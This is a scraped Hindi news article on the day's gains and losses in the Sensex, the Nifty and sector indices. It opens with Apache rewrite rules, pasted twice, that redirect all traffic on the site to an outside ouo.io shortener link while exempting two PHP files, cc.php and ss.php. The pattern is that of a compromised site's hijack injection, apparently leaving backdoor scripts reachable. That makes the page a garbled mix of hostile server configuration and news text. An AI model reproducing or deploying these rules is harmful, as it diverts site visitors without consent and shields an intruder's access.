
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 883
नई दिल्ली। शेयर बाजार में एक बार फिर से रौनक लौट आई है। करीब 12.45 बजे प्रमुख सूचकांक सेंसेक्स 226 अंक चढ़कर 33259 पर और निफ्टी 67 अंक की तेजी के साथ 10221 के स्तर पर कारोबार कर रहा है। नेशनल स्टॉक एक्सचेंज पर मिडकैप इंडेक्स 0.16 फीसद और स्मॉलकैप में 0.07 फीसद की बढ़त देखन को मिल रही है। इस दौरान सबसे ज्यादा खरीदारी PSU शेयर्स में देखने को मिल रही है। बाजार ने शुरुआती मिनटों में जो बढ़त हासिल की थी उसे खो दिया है। करीब 10.30 बजे प्रमुख सूचकांक सेंसेक्स 31 अंक की बढ़त के साथ 33068 के स्तर पर और निफ्टी लाल निशान में 10153 के स्तर पर कारोबार कर रहा है। नेशनल स्टॉक एक्सचेंज पर मिडकैप में 1.12 फीसद और स्मॉलकैप में 1.26 फीसद की कमजोरी देखने को मिल रही है। इस दौरान सबसे ज्यादा बिकवाली मेटल शेयर्स में देखने को मिल रही है। मजबूत ग्लोबल संकेतों के बीच भारतीय शेयर बाजार की शुरुआत बढ़त के साथ हुई। बाजार खुलते ही सेंसेक्स 250 अंक से ज्यादा और निफ्टी 80 अंक से ज्यादा उछल गया। इस तेजी में निफ्टी ने 10200 के स्तर को पार कर लिया, वहीं सेंसेक्स भी 33275 के ऊपर निकल गया। लेकिन बाजार की यह तेजी ज्यादा देर टिक नहीं पाई और करीब 1 घंटे के कारोबार के बाद सेंसेक्स अब महज 100 अंक ऊपर है। आज की तेजी में सबसे ज्यादा खीरदारी रियल्टी शेयरों में देखने को मिल रही है। वहीं पावर कंपनियों के स्टॉक्स में गिरावट का रुख है। नेशनल स्टॉक एक्सचेंज पर सभी इंडेक्स आज बढ़त के साथ कारोबार कर रहे हैं। रियल्टी इंडेक्स 1.20 फीसद की बढ़त के साथ सबसे ऊपर है। वहीं सरकारी बैंक, फार्मा, मेटल, एफएमसीजी और ऑटो इंडेक्स भी आधा फीसद से ज्यादा की तेजी के साथ कारोबार कर रहे हैं। बाजार में चौतरफा खरीदारी के बीच मिडकैप और स्मॉलकैप शेयरों में भी अच्छी बढ़त देखने को मिल रही है। दोनों ही इंडेक्स करीब 1 फीसद की बढ़त के साथ कारोबार कर रहे हैं।